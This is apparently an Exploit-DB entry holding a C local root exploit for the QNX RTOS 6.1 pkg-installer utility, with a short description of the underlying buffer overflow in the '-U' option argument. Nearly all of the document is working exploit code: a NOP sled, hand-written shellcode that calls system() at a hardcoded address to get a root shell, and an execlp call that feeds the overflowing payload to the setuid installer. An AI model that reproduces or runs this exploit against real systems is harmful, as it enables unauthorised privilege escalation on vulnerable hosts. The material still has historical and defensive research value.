QNX RTOS 6.1 - 'PKG-Installer' Local Buffer Overflow

EDB-ID:

21506


Author:

badc0ded

Type:

local


Platform:

Linux

Date:

2002-06-03


/*
source: https://www.securityfocus.com/bid/4918/info

It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition.

The vulnerability is a result of an unbounded string copy of the argument to the "-U" commandline option of pkg-installer to a local buffer. 
*/

/* Quick and dirty QNX pkg-installer root exploit.
 * The shellcode sucks, it is longer than it has
 * to be and you need the address to system() for 
 * it to work. Yes I know I'm lazy....
 * 
 * http://www.badc0ded.com 
*/

main(int argc, char **argv)
{
   int ret=0x804786d;
   char *pret;
   char s[]="\xeb\x0e\x31\xc0\x5b"
            "\x88\x43\x2\x53\xbb"
            "\xe4\xb4\x04\x08"       //system() address
            "\xff\xd3\xe8\xed\xff"
	    "\xff\xff\x73\x68";
   char payload[2000];
   if (argc>=2)
      ret=ret-atoi(argv[1]);
   pret=&ret;
   printf("using ret %x\n",ret);
   memset(payload,0x90,1254);
   sprintf(payload+1254,"%s%s",s,pret);
   execlp("/usr/photon/bin/pkg-installer","pkg-installer","-u",payload,0);

}